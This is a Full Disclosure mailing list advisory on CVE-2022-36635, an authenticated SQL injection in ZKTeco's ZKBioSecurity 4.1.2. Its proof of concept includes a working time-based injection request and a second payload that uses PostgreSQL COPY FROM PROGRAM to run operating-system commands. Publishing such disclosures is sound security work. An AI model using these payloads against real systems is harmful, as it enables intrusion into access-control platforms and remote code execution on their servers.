'[FD] ZKBiosecurity - Authenticated SQL Injection resulting in RCE (CVE-2022-36635)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] ZKBiosecurity - Authenticated SQL Injection resulting in RCE (CVE-2022-36635)
From:       Caio B <caioburgardt () gmail ! com>
Date:       2022-09-29 14:16:47
Message-ID: CAFBQuL5KA2JjM1UBLijt3mB52=EhnrhjZZ5OC90J+T2_z1+iTQ () mail ! gmail ! com
[Download RAW message or body]

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco (
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)

Version Affected: 4.1.2

CVE: CVE-2022-36635

Vulnerability: SQL Injection (with a plus: RCE)

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL
query, with only a sanitization filter in front of it. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.

#######################PROOF OF CONCEPT#######################

Note that the request delayed 10s:

POST /baseOpLog.do HTTP/1.1

Host: {HOST}

Content-Type: application/x-www-form-urlencoded

Cookie: SESSION={COOKIE}; menuType=icon-only

Content-Length: 208

list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/sel \
ect+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50

if you use the next query, you can execute remote command:

list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_coun \
t;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text); \
COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/ \
**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='

#######################END#######################
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 